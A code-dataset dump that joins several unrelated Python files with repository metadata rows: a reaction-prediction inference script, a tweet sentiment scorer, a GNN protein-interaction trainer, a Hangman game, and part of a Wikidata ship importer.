h = g_atom.ggnngwm(f_atoms, f_bonds, super_node_x)
h = g_atom.mlp(h)[:, :, 0]
atoms_record = cp.argsort(functions.sigmoid(h).array + mask_reagents)[:, -10:]
action_step_n = action.shape[1] - 1
m = mask_pair_select.reshape(20, 10 * 10)
pairs_record = cp.zeros((20, action_step_n, 2))
stops_record = cp.zeros((20, action_step_n)).astype('float32')
actions_record = cp.zeros((20, action_step_n)).astype('float32')
# step-wise
for step in range(action_step_n):
# select one pair
h = g_pair.ggnngwm(f_atoms, f_bonds, super_node_x)
f = cp.zeros((20, 10, 100)).astype('float32')
for i in range(20):
f[i] = h[i][atoms_record[i]].array
f = functions.broadcast_to(functions.expand_dims(f, axis=2),
(20, 10, 10, 100)) + \
functions.broadcast_to(functions.expand_dims(f, axis=1),
(20, 10, 10, 100))
f = g_pair.mlp(f.reshape(20, 10 * 10, 100))[:, :, 0]
f = f + (m - 1.) * 1e10
pairs_idx = cp.argmax(functions.softmax(f).array, axis=1)
m[cp.arange(20), pairs_idx] = 0
pairs_i = (pairs_idx / 10).astype('int32')
pairs_j = (pairs_idx % 10).astype('int32')
atoms_i = atoms_record[cp.arange(20), pairs_i]
atoms_j = atoms_record[cp.arange(20), pairs_j]
pairs_record[:, step, 0] = atoms_i
pairs_record[:, step, 1] = atoms_j
# predict the pair of that pair
h = g_action.ggnngwm(f_atoms, f_bonds, super_node_x)
h = h[cp.arange(20), atoms_i] + h[cp.arange(20), atoms_j]
h = h.reshape(20, 1, 100)
h = g_action.mlp(h)[:, 0, :]
actions_record[:, step] = cp.argmax(functions.softmax(h).array, axis=1)
# exec the predicted action
for i in range(20):
if 1. in stops_record[i, :]:
continue
else:
f_bonds[i, :4, atoms_i[i], atoms_j[i]] = 0.0
f_bonds[i, :4, atoms_j[i], atoms_i[i]] = 0.0
f_bonds[i, 4, atoms_i[i], atoms_j[i]] = 1.0
f_bonds[i, 4, atoms_j[i], atoms_i[i]] = 1.0
ac = actions_record[i, step]
if ac != 0.:
f_bonds[i, int(ac - 1), atoms_i[i], atoms_j[i]] = 1.0
f_bonds[i, int(ac - 1), atoms_j[i], atoms_i[i]] = 1.0
# predict stop signal using the updated graph
h = g_stop.ggnngwm(f_atoms, f_bonds, super_node_x)
h = g_stop.mlp(h[cp.arange(20), stop_idx[:, 0]].reshape(20, 1, h.shape[2]))[:, 0, :]
stops_record[:, step] = cp.argmax(functions.softmax(h).array, axis=1)
# record the result by batch
record(atoms_record, pairs_record, actions_record, stops_record, sample_index, data_raw, name)
if __name__ == '__main__':
    # Entry point: build the four trained sub-models (stop / atom / pair /
    # action), load their serialized weights, and run batched step-wise
    # inference over the test set.
    import chainer
    from chainer import serializers
    from chainer.iterators import SerialIterator
    from chainer_chemistry.dataset.converters import concat_mols
    from dataset import uspto_dataset
    from models.nn import ggnngwm_stop_step, ggnngwm_atom, ggnngwm_pair_step, ggnngwn_action_step
    import logging
    import argparse
    from distutils.util import strtobool
    logging.basicConfig(level=logging.INFO)
    parser = argparse.ArgumentParser(description='')
    # Network hyper-parameters; these must match the architecture the
    # snapshots below were trained with, or load_npz will fail.
    parser.add_argument('--hdim', type=int, default=100)
    parser.add_argument('--n_layers', type=int, default=3)
    parser.add_argument('--nn_hidden_dim', type=int, default=50)
    parser.add_argument('--concat_hidden', type=strtobool, default='false')
    parser.add_argument('--weight_tying', type=strtobool, default='false')
    parser.add_argument('--gwm', type=strtobool, default='true')
    parser.add_argument('--topK', type=int, default=10)
    # Snapshot paths for the four sub-models, plus test-data and output paths.
    parser.add_argument('--g_stop', default='inference/snapshot_stop')
    parser.add_argument('--g_atom', default='inference/snapshot_atom')
    parser.add_argument('--g_pair', default='inference/snapshot_pair')
    parser.add_argument('--g_action', default='inference/snapshot_action')
    parser.add_argument('--test_path', default='dataset/test.txt.proc')
    parser.add_argument('--out', default='result_all/inference1')
    args = parser.parse_args()
    # Instantiate each sub-model with the shared architecture flags and
    # restore its weights from the corresponding npz snapshot.
    g_stop = ggnngwm_stop_step(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
                               concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
                               nn_hidden_dim=args.nn_hidden_dim,
                               gwm=args.gwm)
    chainer.serializers.load_npz(args.g_stop, g_stop)
    g_atom = ggnngwm_atom(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
                          concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
                          nn_hidden_dim=args.nn_hidden_dim,
                          gwm=args.gwm,
                          topK=args.topK)
    chainer.serializers.load_npz(args.g_atom, g_atom)
    g_pair = ggnngwm_pair_step(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
                               concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
                               nn_hidden_dim=args.nn_hidden_dim,
                               gwm=args.gwm,
                               topK=args.topK)
    chainer.serializers.load_npz(args.g_pair, g_pair)
    g_action = ggnngwn_action_step(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
                                   concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
                                   nn_hidden_dim=args.nn_hidden_dim,
                                   gwm=args.gwm)
    chainer.serializers.load_npz(args.g_action, g_action)
    # chainer.cuda.get_device_from_id(0).use()
    # g_stop.to_gpu()
    valid_raw = uspto_dataset.read_data(args.test_path)
    valid_dataset = uspto_dataset.USPTO_dataset(valid_raw)
    # Batch size of 20 is hard-coded here and mirrored by the fixed 20s
    # inside inference(); keep them in sync if changing either.
    valid_iter = SerialIterator(valid_dataset, 20, repeat=False, shuffle=False)
    one_part_acc = []
    for batch in valid_iter:
        # get one batch of test data
        f_atoms, f_bonds, super_node_x, \
        atom_label, mask_reagents, mask_reactants_reagents, pair_label, mask_pair_select, \
        action, step_num, \
        stop_idx, \
        sample_index = concat_mols(batch, device=-1)
        # Shift label encodings to what inference() expects; presumably the
        # dataset stores them with a fixed offset -- TODO confirm against
        # uspto_dataset.
        atom_label -= 1
        mask_reagents -= 2
        mask_reactants_reagents -= 2
        action -= 1
        # Inference only: disable train-mode behaviour (e.g. dropout).
        with chainer.using_config('train', False):
            inference(g_stop, g_atom, g_pair, g_action,
                      f_atoms, f_bonds, super_node_x,
                      atom_label, mask_reagents, mask_reactants_reagents, pair_label, mask_pair_select,
                      action, step_num,
                      stop_idx,
                      sample_index, valid_raw, args.out)
| 3,637 | 0 | 46 |
cc05b3e4955027c6c9972e20b8dc759e2042c97c | 2,224 | py | Python | coursera_course_2.py | pandeyxamit/Coursera-Project-1 | a84ce3c036697016b4c83357a1743aefeda8928d | [
"MIT"
] | null | null | null | coursera_course_2.py | pandeyxamit/Coursera-Project-1 | a84ce3c036697016b4c83357a1743aefeda8928d | [
"MIT"
] | null | null | null | coursera_course_2.py | pandeyxamit/Coursera-Project-1 | a84ce3c036697016b4c83357a1743aefeda8928d | [
"MIT"
] | null | null | null | input_file = open("D:/My Files/Projects/Python Programming/coursera_course_2/files/project_twitter_data.csv","r")
output_file = open("D:/My Files/Projects/Python Programming/coursera_course_2/files/resulting_data.csv","w")
punctuation_chars = ["'", '"', ",", ".", "!", ":", ";", '#', '@']
# lists of words to use
positive_words = []
with open("D:/My Files/Projects/Python Programming/coursera_course_2/files/positive_words.txt") as pos_f:
for lin in pos_f:
if lin[0] != ';' and lin[0] != '\n':
positive_words.append(lin.strip())
negative_words = []
with open("D:/My Files/Projects/Python Programming/coursera_course_2/files/negative_words.txt") as pos_f:
for lin in pos_f:
if lin[0] != ';' and lin[0] != '\n':
negative_words.append(lin.strip())
write_file(output_file)
input_file.close()
output_file.close()
| 38.344828 | 144 | 0.597572 | input_file = open("D:/My Files/Projects/Python Programming/coursera_course_2/files/project_twitter_data.csv","r")
output_file = open("D:/My Files/Projects/Python Programming/coursera_course_2/files/resulting_data.csv","w")
punctuation_chars = ["'", '"', ",", ".", "!", ":", ";", '#', '@']
# lists of words to use
def strip_punctuation(string):
    """Return *string* with every character listed in ``punctuation_chars`` removed."""
    # Build the result in one pass, keeping only characters that are not in
    # the module-level punctuation list (equivalent to chained replace calls,
    # since every entry in punctuation_chars is a single character).
    return "".join(ch for ch in string if ch not in punctuation_chars)
positive_words = []
with open("D:/My Files/Projects/Python Programming/coursera_course_2/files/positive_words.txt") as pos_f:
for lin in pos_f:
if lin[0] != ';' and lin[0] != '\n':
positive_words.append(lin.strip())
def get_pos(str_sentence):
    """Count the words of *str_sentence* that appear in ``positive_words``.

    The sentence is lower-cased and stripped of punctuation before the
    whitespace-split words are matched against the lexicon.
    """
    # O(1) set membership instead of scanning the whole lexicon for every
    # word (was O(words x lexicon)).  Assumes positive_words holds unique
    # entries, as the standard opinion-lexicon file does -- TODO confirm.
    lexicon = set(positive_words)
    words = strip_punctuation(str_sentence.lower()).split()
    return sum(1 for word in words if word in lexicon)
negative_words = []
with open("D:/My Files/Projects/Python Programming/coursera_course_2/files/negative_words.txt") as pos_f:
for lin in pos_f:
if lin[0] != ';' and lin[0] != '\n':
negative_words.append(lin.strip())
def get_neg(str_sentence):
    """Count the words of *str_sentence* that appear in ``negative_words``.

    The sentence is lower-cased and stripped of punctuation before the
    whitespace-split words are matched against the lexicon.
    """
    # Mirrors get_pos: O(1) set membership instead of a nested scan over the
    # lexicon.  Assumes negative_words holds unique entries -- TODO confirm.
    lexicon = set(negative_words)
    words = strip_punctuation(str_sentence.lower()).split()
    return sum(1 for word in words if word in lexicon)
def write_file(output_file):
    """Write one CSV row of sentiment scores per tweet read from ``input_file``.

    Columns: retweet count, reply count, positive score, negative score and
    net (positive - negative) score.  The input file's header row is skipped.
    """
    output_file.write("Number of Retweets, Number of Replies, Positive Score, Negative Score, Net Score")
    output_file.write("\n")
    lines = input_file.readlines()
    header = lines.pop(0)  # discard the input CSV header row
    for line in lines:
        # NOTE(review): a plain split(',') breaks if the tweet text itself
        # contains a comma; the csv module would be safer -- confirm the
        # input data is comma-free before relying on this.
        lst = line.strip().split(',')
        # Score each tweet once and reuse the values (the original called
        # get_pos/get_neg twice per row).
        pos = get_pos(lst[0])
        neg = get_neg(lst[0])
        output_file.write("{}, {}, {}, {}, {}".format(lst[1], lst[2], pos, neg, pos - neg))
        output_file.write("\n")
write_file(output_file)
input_file.close()
output_file.close()
| 1,203 | 0 | 134 |
3666628927fca94522490c094abbba1ff31c089f | 10,667 | py | Python | src/benchmark/GNN_PPI/gnn_train.py | zjunlp/OntoProtein | 74e46a8a86bce07c089f29c0ac7c55a76e1f5230 | [
"MIT"
] | 42 | 2022-01-28T11:32:40.000Z | 2022-03-28T13:20:01.000Z | src/benchmark/GNN_PPI/gnn_train.py | zjunlp/OntoProtein | 74e46a8a86bce07c089f29c0ac7c55a76e1f5230 | [
"MIT"
] | 2 | 2022-02-02T15:48:34.000Z | 2022-03-25T07:49:23.000Z | src/benchmark/GNN_PPI/gnn_train.py | zjunlp/OntoProtein | 74e46a8a86bce07c089f29c0ac7c55a76e1f5230 | [
"MIT"
] | 9 | 2022-01-21T06:21:49.000Z | 2022-03-24T05:16:52.000Z | import os
import time
import math
import random
import numpy as np
import argparse
import torch
import torch.nn as nn
from yaml import parse
from gnn_data import GNN_DATA
from gnn_model import GIN_Net2, GIN_Net3
from utils import Metrictor_PPI, print_file
from tensorboardX import SummaryWriter
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
parser = argparse.ArgumentParser(description='Train Model')
parser.add_argument('--description', default=None, type=str,
help='train description')
parser.add_argument('--ppi_path', default=None, type=str,
help="ppi path")
parser.add_argument('--pseq_path', default=None, type=str,
help="protein sequence path")
parser.add_argument('--vec_path', default=None, type=str,
help='protein sequence vector path')
parser.add_argument('--split_new', default=None, type=boolean_string,
help='split new index file or not')
parser.add_argument('--split_mode', default=None, type=str,
help='split method, random, bfs or dfs')
parser.add_argument('--train_valid_index_path', default=None, type=str,
help='cnn_rnn and gnn unified train and valid ppi index')
parser.add_argument('--use_lr_scheduler', default=None, type=boolean_string,
help="train use learning rate scheduler or not")
parser.add_argument('--save_path', default=None, type=str,
help='model save path')
parser.add_argument('--graph_only_train', default=None, type=boolean_string,
help='train ppi graph conctruct by train or all(train with test)')
parser.add_argument('--batch_size', default=None, type=int,
help="gnn train batch size, edge batch size")
parser.add_argument('--lr', default=1e-3, type=float)
parser.add_argument('--epochs', default=None, type=int,
help='train epoch number')
if __name__ == "__main__":
main() | 39.802239 | 206 | 0.630449 | import os
import time
import math
import random
import numpy as np
import argparse
import torch
import torch.nn as nn
from yaml import parse
from gnn_data import GNN_DATA
from gnn_model import GIN_Net2, GIN_Net3
from utils import Metrictor_PPI, print_file
from tensorboardX import SummaryWriter
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
def boolean_string(s):
    """argparse-friendly converter mapping the strings 'True'/'False' to a bool.

    Raises:
        ValueError: if *s* is anything other than 'True' or 'False'.
    """
    if s == 'True':
        return True
    if s == 'False':
        return False
    raise ValueError('Not a valid boolean string')
parser = argparse.ArgumentParser(description='Train Model')
parser.add_argument('--description', default=None, type=str,
help='train description')
parser.add_argument('--ppi_path', default=None, type=str,
help="ppi path")
parser.add_argument('--pseq_path', default=None, type=str,
help="protein sequence path")
parser.add_argument('--vec_path', default=None, type=str,
help='protein sequence vector path')
parser.add_argument('--split_new', default=None, type=boolean_string,
help='split new index file or not')
parser.add_argument('--split_mode', default=None, type=str,
help='split method, random, bfs or dfs')
parser.add_argument('--train_valid_index_path', default=None, type=str,
help='cnn_rnn and gnn unified train and valid ppi index')
parser.add_argument('--use_lr_scheduler', default=None, type=boolean_string,
help="train use learning rate scheduler or not")
parser.add_argument('--save_path', default=None, type=str,
help='model save path')
parser.add_argument('--graph_only_train', default=None, type=boolean_string,
help='train ppi graph conctruct by train or all(train with test)')
parser.add_argument('--batch_size', default=None, type=int,
help="gnn train batch size, edge batch size")
parser.add_argument('--lr', default=1e-3, type=float)
parser.add_argument('--epochs', default=None, type=int,
help='train epoch number')
def train(model, graph, ppi_list, loss_fn, optimizer, device,
          result_file_path, summary_writer, save_path,
          batch_size=512, epochs=1000, scheduler=None,
          got=False):
    """Train the GNN PPI model and validate it once per epoch.

    Each epoch shuffles the training edge ids, runs mini-batch updates,
    then evaluates on ``graph.val_mask`` under ``torch.no_grad()``.  A
    checkpoint is written every epoch and the best-validation-F1 weights
    are kept separately.

    Args:
        model: network called as ``model(node_features, edge_index, edge_ids)``.
        graph: data object carrying features, edge indices, labels and masks.
        ppi_list: list of PPI pairs (not referenced in this function).
        loss_fn: multi-label loss applied to raw model outputs (logits).
        optimizer: optimizer stepped once per mini-batch.
        device: torch device labels/predictions are moved to.
        result_file_path: text file per-epoch summaries are appended to.
        summary_writer: TensorBoard SummaryWriter for scalar logging.
        save_path: directory the checkpoints are written into.
        batch_size: number of edges per training/validation step.
        epochs: number of training epochs.
        scheduler: optional LR scheduler stepped on the mean training loss.
        got: "graph only train" -- when True, use the train-only edge graph
            (``edge_index_got`` / ``edge_attr_got`` / ``train_mask_got``).
    """
    global_step = 0
    global_best_valid_f1 = 0.0
    global_best_valid_f1_epoch = 0
    # Number of undirected truth edges (edge_index stores both directions);
    # computed for reference, not used below.
    truth_edge_num = graph.edge_index.shape[1] // 2
    for epoch in range(epochs):
        recall_sum = 0.0
        precision_sum = 0.0
        f1_sum = 0.0
        loss_sum = 0.0
        steps = math.ceil(len(graph.train_mask) / batch_size)
        model.train()
        # Reshuffle edge ids each epoch so mini-batches differ across epochs.
        random.shuffle(graph.train_mask)
        random.shuffle(graph.train_mask_got)
        for step in range(steps):
            # Last batch takes whatever remains; others take a full slice.
            if step == steps-1:
                if got:
                    train_edge_id = graph.train_mask_got[step*batch_size:]
                else:
                    train_edge_id = graph.train_mask[step*batch_size:]
            else:
                if got:
                    train_edge_id = graph.train_mask_got[step*batch_size : step*batch_size + batch_size]
                else:
                    train_edge_id = graph.train_mask[step*batch_size : step*batch_size + batch_size]
            if got:
                output = model(graph.x, graph.edge_index_got, train_edge_id)
                label = graph.edge_attr_got[train_edge_id]
            else:
                output = model(graph.x, graph.edge_index, train_edge_id)
                label = graph.edge_attr_1[train_edge_id]
            label = label.type(torch.FloatTensor).to(device)
            loss = loss_fn(output, label)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            # Threshold sigmoid probabilities at 0.5 for multi-label metrics.
            m = nn.Sigmoid()
            pre_result = (m(output) > 0.5).type(torch.FloatTensor).to(device)
            metrics = Metrictor_PPI(pre_result.cpu().data, label.cpu().data)
            metrics.show_result()
            recall_sum += metrics.Recall
            precision_sum += metrics.Precision
            f1_sum += metrics.F1
            loss_sum += loss.item()
            summary_writer.add_scalar('train/loss', loss.item(), global_step)
            summary_writer.add_scalar('train/precision', metrics.Precision, global_step)
            summary_writer.add_scalar('train/recall', metrics.Recall, global_step)
            summary_writer.add_scalar('train/F1', metrics.F1, global_step)
            global_step += 1
            print_file("epoch: {}, step: {}, Train: label_loss: {}, precision: {}, recall: {}, f1: {}"
                        .format(epoch, step, loss.item(), metrics.Precision, metrics.Recall, metrics.F1))
        # Checkpoint every epoch (overwrites the previous one).
        torch.save({'epoch': epoch,
                    'state_dict': model.state_dict()},
                    os.path.join(save_path, 'gnn_model_train.ckpt'))
        # ---- validation pass over the full graph edges ----
        valid_pre_result_list = []
        valid_label_list = []
        valid_loss_sum = 0.0
        model.eval()
        valid_steps = math.ceil(len(graph.val_mask) / batch_size)
        with torch.no_grad():
            for step in range(valid_steps):
                if step == valid_steps-1:
                    valid_edge_id = graph.val_mask[step*batch_size:]
                else:
                    valid_edge_id = graph.val_mask[step*batch_size : step*batch_size + batch_size]
                output = model(graph.x, graph.edge_index, valid_edge_id)
                label = graph.edge_attr_1[valid_edge_id]
                label = label.type(torch.FloatTensor).to(device)
                loss = loss_fn(output, label)
                valid_loss_sum += loss.item()
                m = nn.Sigmoid()
                pre_result = (m(output) > 0.5).type(torch.FloatTensor).to(device)
                valid_pre_result_list.append(pre_result.cpu().data)
                valid_label_list.append(label.cpu().data)
        # Compute validation metrics over all batches at once.
        valid_pre_result_list = torch.cat(valid_pre_result_list, dim=0)
        valid_label_list = torch.cat(valid_label_list, dim=0)
        metrics = Metrictor_PPI(valid_pre_result_list, valid_label_list)
        metrics.show_result()
        recall = recall_sum / steps
        precision = precision_sum / steps
        f1 = f1_sum / steps
        loss = loss_sum / steps
        valid_loss = valid_loss_sum / valid_steps
        # NOTE(review): 'scheduler is not None' is the idiomatic test here.
        if scheduler != None:
            # Scheduler is driven by the *training* loss average.
            scheduler.step(loss)
            print_file("epoch: {}, now learning rate: {}".format(epoch, scheduler.optimizer.param_groups[0]['lr']), save_file_path=result_file_path)
        # Keep a separate checkpoint of the best validation-F1 model.
        if global_best_valid_f1 < metrics.F1:
            global_best_valid_f1 = metrics.F1
            global_best_valid_f1_epoch = epoch
            torch.save({'epoch': epoch,
                        'state_dict': model.state_dict()},
                        os.path.join(save_path, 'gnn_model_valid_best.ckpt'))
        summary_writer.add_scalar('valid/precision', metrics.Precision, global_step)
        summary_writer.add_scalar('valid/recall', metrics.Recall, global_step)
        summary_writer.add_scalar('valid/F1', metrics.F1, global_step)
        summary_writer.add_scalar('valid/loss', valid_loss, global_step)
        print_file("epoch: {}, Training_avg: label_loss: {}, recall: {}, precision: {}, F1: {}, Validation_avg: loss: {}, recall: {}, precision: {}, F1: {}, Best valid_f1: {}, in {} epoch"
                   .format(epoch, loss, recall, precision, f1, valid_loss, metrics.Recall, metrics.Precision, metrics.F1, global_best_valid_f1, global_best_valid_f1_epoch), save_file_path=result_file_path)
def main():
    """Parse CLI args, build the PPI dataset/model, and run training.

    Side effects: creates a timestamped run directory under ``args.save_path``
    containing a config dump, TensorBoard logs, validation results and model
    checkpoints.
    """
    args = parser.parse_args()
    ppi_data = GNN_DATA(ppi_path=args.ppi_path)
    print("use_get_feature_origin")
    ppi_data.get_feature_origin(pseq_path=args.pseq_path, vec_path=args.vec_path)
    ppi_data.generate_data()
    print("----------------------- start split train and valid index -------------------")
    print("whether to split new train and valid index file, {}".format(args.split_new))
    if args.split_new:
        print("use {} method to split".format(args.split_mode))
    ppi_data.split_dataset(args.train_valid_index_path, random_new=args.split_new, mode=args.split_mode)
    print("----------------------- Done split train and valid index -------------------")
    graph = ppi_data.data
    print(graph.x.shape)
    ppi_list = ppi_data.ppi_list
    graph.train_mask = ppi_data.ppi_split_dict['train_index']
    graph.val_mask = ppi_data.ppi_split_dict['valid_index']
    print("train gnn, train_num: {}, valid_num: {}".format(len(graph.train_mask), len(graph.val_mask)))
    # Build the "graph only train" edge set: training edges plus their
    # reversed copies ([[1, 0]] swaps the two endpoint rows), with labels
    # duplicated to match.
    graph.edge_index_got = torch.cat((graph.edge_index[:, graph.train_mask], graph.edge_index[:, graph.train_mask][[1, 0]]), dim=1)
    graph.edge_attr_got = torch.cat((graph.edge_attr_1[graph.train_mask], graph.edge_attr_1[graph.train_mask]), dim=0)
    graph.train_mask_got = [i for i in range(len(graph.train_mask))]
    # NOTE(review): GPU index 7 is hard-coded; adjust for the local machine.
    device = torch.device('cuda:7' if torch.cuda.is_available() else 'cpu')
    print(device)
    graph.to(device)
    # model = GIN_Net2(in_len=2000, in_feature=13, gin_in_feature=256, num_layers=1, pool_size=3, cnn_hidden=1).to(device)
    model = GIN_Net3(embed_size=1024, gin_in_feature=256, num_layers=1, pool_size=3, cnn_hidden=1).to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=5e-4)
    scheduler = None
    if args.use_lr_scheduler:
        # Halve the LR when the training loss plateaus for 20 epochs.
        scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=20, verbose=True)
    loss_fn = nn.BCEWithLogitsLoss().to(device)
    if not os.path.exists(args.save_path):
        os.mkdir(args.save_path)
    # Timestamped run directory; also dump all CLI args for reproducibility.
    time_stamp = time.strftime("%Y-%m-%d %H:%M:%S")
    save_path = os.path.join(args.save_path, "gnn_{}_{}".format(args.description, time_stamp))
    result_file_path = os.path.join(save_path, "valid_results.txt")
    config_path = os.path.join(save_path, "config.txt")
    os.mkdir(save_path)
    with open(config_path, 'w') as f:
        args_dict = args.__dict__
        for key in args_dict:
            f.write("{} = {}".format(key, args_dict[key]))
            f.write('\n')
        f.write('\n')
        f.write("train gnn, train_num: {}, valid_num: {}".format(len(graph.train_mask), len(graph.val_mask)))
    summary_writer = SummaryWriter(save_path)
    train(model, graph, ppi_list, loss_fn, optimizer, device,
          result_file_path, summary_writer, save_path,
          batch_size=args.batch_size, epochs=args.epochs, scheduler=scheduler,
          got=args.graph_only_train)
    summary_writer.close()
if __name__ == "__main__":
main() | 8,615 | 0 | 69 |
efc366eb57be3992c78c43f0ee2903cbb4b3bdf9 | 3,042 | py | Python | Hangman/Hangman.py | DavBebawy/School-Projects | beeeb3fa219d99f0163f4137f51e02070ba3b6ae | [
"MIT"
] | null | null | null | Hangman/Hangman.py | DavBebawy/School-Projects | beeeb3fa219d99f0163f4137f51e02070ba3b6ae | [
"MIT"
] | null | null | null | Hangman/Hangman.py | DavBebawy/School-Projects | beeeb3fa219d99f0163f4137f51e02070ba3b6ae | [
"MIT"
] | null | null | null | import random
import sys
textfile = "wordlist.txt"
userinput = True
wordcounts = dict()
words = dict()
#Print an error and exit gracefully if wordlist is not found
try:
open(textfile)
except FileNotFoundError:
print(textfile + " not find. Please make sure it exists in current directory.")
sys.exit()
#Open the wordlist.txt and read each line into the dictionary wordcounts in a with the word length as the key
with open(textfile) as infile:
for line in infile:
for word in line.split():
wordcounts.setdefault(len(word),[]).append(word)
print("Welcome to Hangman")
#Ask for user input, check if it's an int bigger than 2 and smaller than the maximum length
while userinput:
wordlength = input("What length word would you like me to choose? ==> ")
try:
int(wordlength)
except ValueError:
print("Input is invalid, please try again")
continue
wordlength = int(wordlength)
words = wordcounts.get(wordlength)
if not words or wordlength < 2:
print("Input is invalid, please try again")
else:
userinput = False
#choose a random word with the specified length
word = random.choice(words)
#create a list of *s with the same length as the chosen word
filled_word = ['*'] * len(word)
guesses_left = 7
#loop: ask for user input for a letter or a word, give and error and try again if not
while guesses_left > 0:
print("\nWord: " + ''.join(filled_word))
print("You have " + str(guesses_left) + " guesses remaining.")
guess = input("Type a letter or a word guess: ")
if not guess.isalpha():
print("Wrong input.\n")
continue
elif len(guess) == 1: #letter guess, check the occurence of the letter, 'reveal' the letter in the word, or if it doesn't exist, decrement guesses_left and restart loop
guess = guess.lower()
index = 0
found = []
while index < len(word):
index = word.find(guess, index)
if index >= 0:
found.append(index)
index += 1
elif len(found) > 0:
print("There is " + str(len(found)) + " " + guess + "!")
break
else:
print("Sorry, there are no " + guess + "'s.")
guesses_left -= 1
break
for x in found:
filled_word[x] = guess
if ''.join(filled_word) == word:
print("\nCongratulations, you guessed it!")
break
else: #word guess, check if the guess matches the word. End the game if guessed correctly, otherwise decrement guesses_left and restart loop
guess = guess.lower()
if guess == word:
print("\nCongratulations, you guessed it!")
break
else:
guesses_left -= 1
print("Sorry, the word is not '" + guess + "'")
if guesses_left == 0: #if the user runs out of guesses, reveal the word
print("\nYou are out of guesses. The word was: " + word)
print("Game Over") | 34.965517 | 172 | 0.611111 | import random
import sys
textfile = "wordlist.txt"
userinput = True
wordcounts = dict()
words = dict()
#Print an error and exit gracefully if wordlist is not found
try:
open(textfile)
except FileNotFoundError:
print(textfile + " not find. Please make sure it exists in current directory.")
sys.exit()
#Open the wordlist.txt and read each line into the dictionary wordcounts in a with the word length as the key
with open(textfile) as infile:
for line in infile:
for word in line.split():
wordcounts.setdefault(len(word),[]).append(word)
print("Welcome to Hangman")
#Ask for user input, check if it's an int bigger than 2 and smaller than the maximum length
while userinput:
wordlength = input("What length word would you like me to choose? ==> ")
try:
int(wordlength)
except ValueError:
print("Input is invalid, please try again")
continue
wordlength = int(wordlength)
words = wordcounts.get(wordlength)
if not words or wordlength < 2:
print("Input is invalid, please try again")
else:
userinput = False
#choose a random word with the specified length
word = random.choice(words)
#create a list of *s with the same length as the chosen word
filled_word = ['*'] * len(word)
guesses_left = 7
#loop: ask for user input for a letter or a word, give and error and try again if not
while guesses_left > 0:
print("\nWord: " + ''.join(filled_word))
print("You have " + str(guesses_left) + " guesses remaining.")
guess = input("Type a letter or a word guess: ")
if not guess.isalpha():
print("Wrong input.\n")
continue
elif len(guess) == 1: #letter guess, check the occurence of the letter, 'reveal' the letter in the word, or if it doesn't exist, decrement guesses_left and restart loop
guess = guess.lower()
index = 0
found = []
while index < len(word):
index = word.find(guess, index)
if index >= 0:
found.append(index)
index += 1
elif len(found) > 0:
print("There is " + str(len(found)) + " " + guess + "!")
break
else:
print("Sorry, there are no " + guess + "'s.")
guesses_left -= 1
break
for x in found:
filled_word[x] = guess
if ''.join(filled_word) == word:
print("\nCongratulations, you guessed it!")
break
else: #word guess, check if the guess matches the word. End the game if guessed correctly, otherwise decrement guesses_left and restart loop
guess = guess.lower()
if guess == word:
print("\nCongratulations, you guessed it!")
break
else:
guesses_left -= 1
print("Sorry, the word is not '" + guess + "'")
if guesses_left == 0: #if the user runs out of guesses, reveal the word
print("\nYou are out of guesses. The word was: " + word)
print("Game Over") | 0 | 0 | 0 |
349c39ae63e190bd17cd57a8d76919c472ac1ee0 | 6,518 | py | Python | importer/SeShipSv.py | Vesihiisi/COH-tools | a874f076cb93b93722efb1be56a66a9380bcb7c4 | [
"MIT"
] | 4 | 2017-01-12T14:43:28.000Z | 2017-09-08T20:29:30.000Z | importer/SeShipSv.py | Vesihiisi/COH-tools | a874f076cb93b93722efb1be56a66a9380bcb7c4 | [
"MIT"
] | 103 | 2017-01-13T13:25:03.000Z | 2018-09-05T12:29:41.000Z | importer/SeShipSv.py | Vesihiisi/COH-tools | a874f076cb93b93722efb1be56a66a9380bcb7c4 | [
"MIT"
] | 2 | 2017-03-23T10:22:54.000Z | 2018-01-08T09:25:03.000Z | from Monument import Monument, Dataset
import importer_utils as utils
import importer as importer
if __name__ == "__main__":
"""Command line entry point for importer."""
args = importer.handle_args()
dataset = Dataset("se-ship", "sv", SeShipSv)
dataset.data_files = {
"functions": "se-ship_(sv)_functions.json"}
importer.main(args, dataset)
| 37.034091 | 100 | 0.574256 | from Monument import Monument, Dataset
import importer_utils as utils
import importer as importer
class SeShipSv(Monument):
    """Wikidata data object for one listed Swedish ship (WLM se-ship dataset).

    Each ``set_*`` method maps one column of the WLM database row to a
    Wikidata statement; unparsable values are logged to the problem report.
    """

    def set_type(self):
        """
        Set the specific type of watercraft.
        In some cases, there's a more specific ship type in
        the 'funktion' column.
        Here are all the possible values:
        https://www.wikidata.org/wiki/Wikidata:WikiProject_WLM/Mapping_tables/se-ship_(sv)/functions
        This table is used as the base for mapping.
        If there's a mapping for the specific value,
        it will substitute the default P31 (watercraft)
        """
        table = self.data_files["functions"]["mappings"]
        if self.funktion:
            special_type = self.funktion.lower()
            try:
                # IndexError from [0] means no mapping matched this value.
                functions = [table[x]["items"]
                             for x in table if x.lower() == special_type][0]
                if len(functions) > 0:
                    self.remove_statement("is")
                    for f in functions:
                        ref = self.wlm_source
                        self.add_statement("is", f, refs=[ref])
            except IndexError:
                self.add_to_report("funktion", self.funktion)

    def set_shipyard(self):
        """
        Set the manufacturer property.
        Process the column 'varv'.
        It can look like this:
        '[[Bergsunds varv]]<br>[[Stockholm]]'
        We only use this if the actual shipyard is
        wikilinked, which is not always the case.
        Use WLM database as reference.
        """
        if self.has_non_empty_attribute("varv"):
            possible_varv = self.varv
            if "<br>" in possible_varv:
                # Keep only the part before the line break (the shipyard).
                possible_varv = self.varv.split("<br>")[0]
            if "[[" in possible_varv:
                varv = utils.q_from_first_wikilink("sv", possible_varv)
                ref = self.wlm_source
